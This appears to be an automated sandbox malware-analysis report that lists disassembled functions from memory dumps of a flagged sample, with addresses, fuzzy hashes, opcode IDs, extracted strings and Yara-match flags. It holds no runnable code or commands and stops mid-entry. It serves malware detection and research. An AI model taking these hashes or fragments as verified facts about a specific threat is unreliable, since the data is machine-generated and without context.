                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID: s+b
                  • API String ID: 4139908857-2084237830
                  • Opcode ID: d4b2d837b779eac78be255ae88e81b2185b8b0e7378c971c05733210ff4eb710
                  • Instruction ID: f9029724ba1459a1b5ee5aab6d670bedbb9ac104c5b97405957a598316586186
                  • Opcode Fuzzy Hash: d4b2d837b779eac78be255ae88e81b2185b8b0e7378c971c05733210ff4eb710
                  • Instruction Fuzzy Hash: B1C1F376C117368FC798EFB5FCA612D3663BB52312F85721EE84297126CE3455018ECA
                  Function 031D5840 Relevance: 3.3, Strings: 2, Instructions: 830COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: ecea99c313fb835ddc67bed3e82df348b2e2e647a9805d05cca988f8d7bbb49b
                  • Instruction ID: 66fc09cbe0f76fab2aecca4097d7648b31ca5d01eb94f170344db3534da71672
                  • Opcode Fuzzy Hash: ecea99c313fb835ddc67bed3e82df348b2e2e647a9805d05cca988f8d7bbb49b
                  • Instruction Fuzzy Hash: C0727A716083409FD724CF18C894B9BBBE2BF8A314F48896DF9898B391D775D944CB92
                  Function 02D971B3 Relevance: 3.3, Strings: 2, Instructions: 830COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$8
                  • API String ID: 0-46163386
                  • Opcode ID: ae9b07aa68c984fb98c592c5617019e2335096fe10a6d80f689ac4aa3b39ade9
                  • Instruction ID: 9aa228ad323b87ad3cf99fd985bf4dd7ae774ae119ee28b18a8ceab547ed34a8
                  • Opcode Fuzzy Hash: ae9b07aa68c984fb98c592c5617019e2335096fe10a6d80f689ac4aa3b39ade9
                  • Instruction Fuzzy Hash: F67249B16183419FEB24CF18C880B9ABBE2BF89314F44892DF9D987391D775D944CB92
                  Function 02DA1369 Relevance: 3.2, Strings: 2, Instructions: 738COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: RMBC$ISO
                  • API String ID: 0-3736530453
                  • Opcode ID: bbd01de57df202e2ffe147973fd77cf7d917416371883bb82c0ae0f2497ea45a
                  • Instruction ID: fd88f0b459e0fd99f8a917a3394086963c6b6f35af1712e86ec3d864b5f18ff7
                  • Opcode Fuzzy Hash: bbd01de57df202e2ffe147973fd77cf7d917416371883bb82c0ae0f2497ea45a
                  • Instruction Fuzzy Hash: AA42ACB0904B419FD724CF29C985B12BBF1FF46204F14869CE8EA8BB95E334E815CB95
                  Function 031F79E9 Relevance: 3.2, Strings: 2, Instructions: 728COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 2PBd$ptF`
                  • API String ID: 0-336479791
                  • Opcode ID: 7e6259e80c704284f44c1a3b97d40ae8bbea013c393dbe37ef04df824034028a
                  • Instruction ID: e996d50db4d242b84227873eb0ec631fa29a781776ffa13066f1ea66c8321c7f
                  • Opcode Fuzzy Hash: 7e6259e80c704284f44c1a3b97d40ae8bbea013c393dbe37ef04df824034028a
                  • Instruction Fuzzy Hash: 11428E70104B808FD329CF28C0A47A7FBE2BF4A344F484A5EC4EB5B686D779A549CB54
                  Function 02DB935C Relevance: 3.2, Strings: 2, Instructions: 728COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2PBd$ptF`
                  • API String ID: 0-336479791
                  • Opcode ID: fa2f74805cd26863cc785642c9be31b42664ec1e740e4e1cd15f0027f5e5f66c
                  • Instruction ID: cf350d0ea93fe9c6f253aa68cd45cf3563f8a6e90d3525a77993e8f6c0e90289
                  • Opcode Fuzzy Hash: fa2f74805cd26863cc785642c9be31b42664ec1e740e4e1cd15f0027f5e5f66c
                  • Instruction Fuzzy Hash: 57425B70108B808BD32ACF25C0B47E6BBE2BF5A308F444A5EC4DB5B796D779A505CB54
                  Function 03206820 Relevance: 3.2, Strings: 2, Instructions: 701COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: G@AB$G@AB
                  • API String ID: 0-3861075807
                  • Opcode ID: 722e67ea6ad497729501b7b8ba04c60ac161c1301fbfebc9ed090c293e701b13
                  • Instruction ID: e08a816f6d24d41dad865028f1ebd7567547cabc0f269f8e5698d1d3ade57060
                  • Opcode Fuzzy Hash: 722e67ea6ad497729501b7b8ba04c60ac161c1301fbfebc9ed090c293e701b13
                  • Instruction Fuzzy Hash: E332CF716183429FC714CF18C590B2AFBE2EBC9314F188A6CF4958B392D775D899CB92
                  Function 02DC8193 Relevance: 3.2, Strings: 2, Instructions: 701COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G@AB$G@AB
                  • API String ID: 0-3861075807
                  • Opcode ID: 8b59017345577f727dedd1df0dfcbb0a8c56d68d78455d67205dc44a51394b6e
                  • Instruction ID: 4c2dd4e266d00fa498981909eb31e0850245d2ba14e741982c48ee75e1cae96b
                  • Opcode Fuzzy Hash: 8b59017345577f727dedd1df0dfcbb0a8c56d68d78455d67205dc44a51394b6e
                  • Instruction Fuzzy Hash: 77329D71A083429FC715CF18C890B6ABBE2ABC5318F288A2DF495CB391D775DC45DB92
                  Function 031F4EE0 Relevance: 3.1, Strings: 2, Instructions: 568COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$"
                  • API String ID: 0-3758156766
                  • Opcode ID: a2158502be4dbb30d2fa337472c15c8b71818eb3869606d7dc1b7491f01b9c6a
                  • Instruction ID: cfeac87c4bc1310711fd7a3f9fc84ae14999a0c90c08013ea27983ab2be1777a
                  • Opcode Fuzzy Hash: a2158502be4dbb30d2fa337472c15c8b71818eb3869606d7dc1b7491f01b9c6a
                  • Instruction Fuzzy Hash: 1612E471A083059FC714CE29C49076BFBE7AFCA314F1D8A2DE6998B391D734D9458B82
                  Function 02DB6853 Relevance: 3.1, Strings: 2, Instructions: 568COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "$"
                  • API String ID: 0-3758156766
                  • Opcode ID: f4ef29c514207889e88bf400dc084ea6d2a8f6e52cf96fe2ce94e306c8dfe94d
                  • Instruction ID: 4d792725c9e797eb1ec848290938d4fa2985e5e073d901c1582f38127382b074
                  • Opcode Fuzzy Hash: f4ef29c514207889e88bf400dc084ea6d2a8f6e52cf96fe2ce94e306c8dfe94d
                  • Instruction Fuzzy Hash: 2612E572A08301DFCB16CE28C4647AABBEAAFC5314F19892DE49687390D774DD45CBD2
                  Function 0063359E Relevance: 3.0, APIs: 2, Instructions: 5COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00635F45,?,?,?,00000001), ref: 006335A0
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006335AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 77756f9984b5a2704f8e270c2c2893f294d5665fad2aae01420be568e419d888
                  • Instruction ID: 360b7e7affb72527f20e1b0a9f69ad668055e27d85e69f8e66e2fc89ce5d6141
                  • Opcode Fuzzy Hash: 77756f9984b5a2704f8e270c2c2893f294d5665fad2aae01420be568e419d888
                  • Instruction Fuzzy Hash: FAB00235544146ABDF416B60DD5D7197A72BFC6702FA45454F3554517087714410DB11
                  Function 02D966A3 Relevance: 2.9, Strings: 2, Instructions: 415COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: )$IEND
                  • API String ID: 0-707183367
                  • Opcode ID: 774330107aff78249226436a439730ae7780f395c53994f75c23c609800b495e
                  • Instruction ID: 9c03e84040d2875810c19336d73975afbb07a2cfb484c5af9c15d39d350a8d37
                  • Opcode Fuzzy Hash: 774330107aff78249226436a439730ae7780f395c53994f75c23c609800b495e
                  • Instruction Fuzzy Hash: 28F1B2B1A087009FDB24CF28C89575BBBE5EB85314F04892DF9999B381D775E908CBD2
                  Function 02D9A693 Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: -$C
                  • API String ID: 0-3758657169
                  • Opcode ID: ccba9808cf3c121c3b307127656e266c7b283f1f37183e3f4c1d76d311b1b06c
                  • Instruction ID: e78b38f7931726e2d6356a2c1eb068ed4b497d0a84cbbde9bbb8228595cf5cfb
                  • Opcode Fuzzy Hash: ccba9808cf3c121c3b307127656e266c7b283f1f37183e3f4c1d76d311b1b06c
                  • Instruction Fuzzy Hash: 3CD1F633B087415FC714CE29C8D435AB7E2ABC5214F6ACA2DF4D58B3A5D239DC428B81
                  Function 02DA293D Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: uw$y{
                  • API String ID: 0-756344669
                  • Opcode ID: ff34013749329c9180dac4d61083103a6751bca0845fd6d8d41124452a9fcd4a
                  • Instruction ID: 0537c3749dfdcabf43924d9c4f660187836f92644f7a5bc69d48601bb9fab7d9
                  • Opcode Fuzzy Hash: ff34013749329c9180dac4d61083103a6751bca0845fd6d8d41124452a9fcd4a
                  • Instruction Fuzzy Hash: CDD158B4104B829FD7258F2AC5A4B12BBF2BF46704F18894DD8EA4BB95C335F815CB94
                  Function 031F6446 Relevance: 2.8, Strings: 2, Instructions: 305COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9Y6[$uw
                  • API String ID: 0-3032700206
                  • Opcode ID: 5faabd80eefbe2f09f4ddc0443d7745e4ad50e219fed1c6b71c8d1552f196f53
                  • Instruction ID: e117b3484a318dbc733b1951ef68fb46e76301de80de7d63c577db11022949c4
                  • Opcode Fuzzy Hash: 5faabd80eefbe2f09f4ddc0443d7745e4ad50e219fed1c6b71c8d1552f196f53
                  • Instruction Fuzzy Hash: D9B17970104F818FD325CF39C4A47A7BBE1AF1A305F08895DD9EB9B286DB79A109CB50
                  Function 031F6449 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9Y6[$uw
                  • API String ID: 0-3032700206
                  • Opcode ID: f2fae8d09909fe63dcbebd6dbd5019065f997df6b3b7f108a86a926a716d7605
                  • Instruction ID: 4dbcdcd915bc5bf7d70682f910314e927a83bce56637cffc6dbf71cd6a19be9f
                  • Opcode Fuzzy Hash: f2fae8d09909fe63dcbebd6dbd5019065f997df6b3b7f108a86a926a716d7605
                  • Instruction Fuzzy Hash: ADB16870104B818BD725CF39C4A47A7BBE1AF1A305F08895DD8EB9B286DB79610ACB50
                  Function 031D8D20 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: -
                  • API String ID: 0-2547889144
                  • Opcode ID: 73c43bb1d066a804fbf90494358e4f2c6a0b165bfa678e058b586f54aeb1382f
                  • Instruction ID: e0d437c82797636d8254b5f654832a44396c3b88e9008417ed5405e8e56a21dd
                  • Opcode Fuzzy Hash: 73c43bb1d066a804fbf90494358e4f2c6a0b165bfa678e058b586f54aeb1382f
                  • Instruction Fuzzy Hash: 8FD1F772B087414BC314CE2CD8D435AB7E7ABCA324F1DCA6DE495DB3A5D73898458B81
                  Function 02DB2993 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G@AB
                  • API String ID: 0-648899744
                  • Opcode ID: cb5cdb20ae3208590ba102de997517580821a7a22d71e0c7190c5d39c4eaa812
                  • Instruction ID: 185eacd294b6e0cad75c20ec52651fa0af9ce84754db0e12cce6eeb3e4b89a5d
                  • Opcode Fuzzy Hash: cb5cdb20ae3208590ba102de997517580821a7a22d71e0c7190c5d39c4eaa812
                  • Instruction Fuzzy Hash: 7DC1BE72A08302CBD712CF28C894BAAB7E1EF95354F14492DE8C687351E734DD44CB96
                  Function 0062CF66 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog3.LIBCMT ref: 0062CF6D
                    • Part of subcall function 0062CE8C: __EH_prolog3_catch.LIBCMT ref: 0062CE93
                    • Part of subcall function 0062CEF9: __EH_prolog3_catch.LIBCMT ref: 0062CF00
                    • Part of subcall function 0062CDB2: __EH_prolog3_catch.LIBCMT ref: 0062CDB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: H_prolog3_catch$H_prolog3
                  • String ID:
                  • API String ID: 3796446187-0
                  • Opcode ID: ded028d21f636defe22cdf5194be991d4bdf54077cb2285a031602158f1c55a9
                  • Instruction ID: 74a9e16d6c8accd44b304183621660f9bc4400d223591a1bfbea23c33f49c7c6
                  • Opcode Fuzzy Hash: ded028d21f636defe22cdf5194be991d4bdf54077cb2285a031602158f1c55a9
                  • Instruction Fuzzy Hash: 75410175501A86AAC355DF34C551A96FBF4BF19310B00862EE4DA87E11E730F628CB98
                  Function 006410FF Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,00000001,00000000,?), ref: 00641197
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: 80726ca0613320d09fda8e67fd1a229edb32e98df8fcc02c0ba19daa9448a10a
                  • Instruction ID: 385b4e2581d67386fcb9e31fd0f36a7a3a7af4becf71513f6a53e75492f3606e
                  • Opcode Fuzzy Hash: 80726ca0613320d09fda8e67fd1a229edb32e98df8fcc02c0ba19daa9448a10a
                  • Instruction Fuzzy Hash: 9B210B751002089FCB28DF64D8559FA73B9FF07300F14869EEA068F391E6315ACACB44
                  Function 031F5B60 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: /}2
                  • API String ID: 0-1394798542
                  • Opcode ID: 8a7f713d8881b7a4ecb1e4d826c6b4c9676c9be78917985ce87da50e287e9f96
                  • Instruction ID: 86706dcc4ff31cfde7ffd9cafcd3e84e8d79d754872b73f424e59f0f9892da4f
                  • Opcode Fuzzy Hash: 8a7f713d8881b7a4ecb1e4d826c6b4c9676c9be78917985ce87da50e287e9f96
                  • Instruction Fuzzy Hash: BBB1B130604B818FC33CCF39C595666FBE2AF4B208F189A6DD5E78B296D734A449CB14
                  Function 02DB74D3 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /}2
                  • API String ID: 0-1394798542
                  • Opcode ID: 6399570b5e2231a9c6546759a140a97b2c86242a763e8762080b2307229b002d
                  • Instruction ID: 7d1ff96d5232810056ca30981d3794bfe7acb5d0ef538e9b0cabe096e33b6257
                  • Opcode Fuzzy Hash: 6399570b5e2231a9c6546759a140a97b2c86242a763e8762080b2307229b002d
                  • Instruction Fuzzy Hash: A8B1D261604781CBE72DCF3985A53B6FBE2EF96208F18966DD4E78B781D334A805CB14
                  Function 031D6A90 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: ,
                  • API String ID: 0-3772416878
                  • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                  • Instruction ID: c27f670694e850d978549aa5b186512f84823ab0c22aa8b6073c53d10a4dc1a2
                  • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                  • Instruction Fuzzy Hash: 6FB12A712093819FD314CF68C84465AFBE0AFAA304F484A5DF5D897382D375EA58CB96
                  Function 02D98403 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ,
                  • API String ID: 0-3772416878
                  • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                  • Instruction ID: a33d27d6d1db8675dda7e6cf85ad2570cf52ecfd6281efc015fb2eb636c4aeaa
                  • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                  • Instruction Fuzzy Hash: 0DB138712093819FD714CF68C88475AFBE1AFAA704F444A5DF4D897382C375EA18CB96
                  Function 00633576 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0063357A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 225e7bfedc426330b2cd04e58b706786993e619c06ebb3496c315991216c65f9
                  • Instruction ID: cb62a7ff3aa427e81e84327c052a0dca87a2f2d2464adf73f6abf07188b3633f
                  • Opcode Fuzzy Hash: 225e7bfedc426330b2cd04e58b706786993e619c06ebb3496c315991216c65f9
                  • Instruction Fuzzy Hash: 84900234404106ABCF015B10DE594097A62BB81701B605454F2464203087314810EA11
                  Function 031D9550 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: i`W-
                  • API String ID: 0-2677554003
                  • Opcode ID: a46fc1db8e10e722c9c01397d9d02ce769276681f9cf0c12878f467c92555586
                  • Instruction ID: eb1d4f47fe38011bec50fb97047ea98edcb0233e3931b25bda7bd19705af84a7
                  • Opcode Fuzzy Hash: a46fc1db8e10e722c9c01397d9d02ce769276681f9cf0c12878f467c92555586
                  • Instruction Fuzzy Hash: C4715A315493919BD311CF29C09071BFFE2AFDA754F188A8CE8C42B269C375994ACB96
                  Function 02D9AEC3 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: i`W-
                  • API String ID: 0-2677554003
                  • Opcode ID: a46fc1db8e10e722c9c01397d9d02ce769276681f9cf0c12878f467c92555586
                  • Instruction ID: 88eabb0c28df9f4d150023b923c8a322b5145b790e3ee7f7a34be26bf5725161
                  • Opcode Fuzzy Hash: a46fc1db8e10e722c9c01397d9d02ce769276681f9cf0c12878f467c92555586
                  • Instruction Fuzzy Hash: 02719B7154D3818BD311CF29C09071AFFE2AFC6758F188A8DE8D42B365C3769949CB96
                  Function 00623B5D Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: M'e
                  • API String ID: 0-1612636211
                  • Opcode ID: e8a199fd362b620e6a83387a0b62ce71a7e677acca967fca99fd0653f4f0cc22
                  • Instruction ID: c01307920967cb00715f66c27d9c0b0e7b64a5a3b67c72e8567375145e1c554f
                  • Opcode Fuzzy Hash: e8a199fd362b620e6a83387a0b62ce71a7e677acca967fca99fd0653f4f0cc22
                  • Instruction Fuzzy Hash: 5C51F673D147238F8398EFB9FCB605A7663FB82303F46A61ED442A3526CA3159018ED5
                  Function 02DCCB13 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: @
                  • API String ID: 0-2766056989
                  • Opcode ID: 75cf80f293eef23c4219f3a3d5ac79de104e1eb17877f63dcd2ab34cd5856574
                  • Instruction ID: 095799a9e5e87a268e1455d1e4892549da78b056977c2c6f6e47105f7516233a
                  • Opcode Fuzzy Hash: 75cf80f293eef23c4219f3a3d5ac79de104e1eb17877f63dcd2ab34cd5856574
                  • Instruction Fuzzy Hash: 7441C5B15182018FD714CF28C88576AB7F1EF95318F288A2DE598DB3A0E735D905CB96
                  Function 02DCC953 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
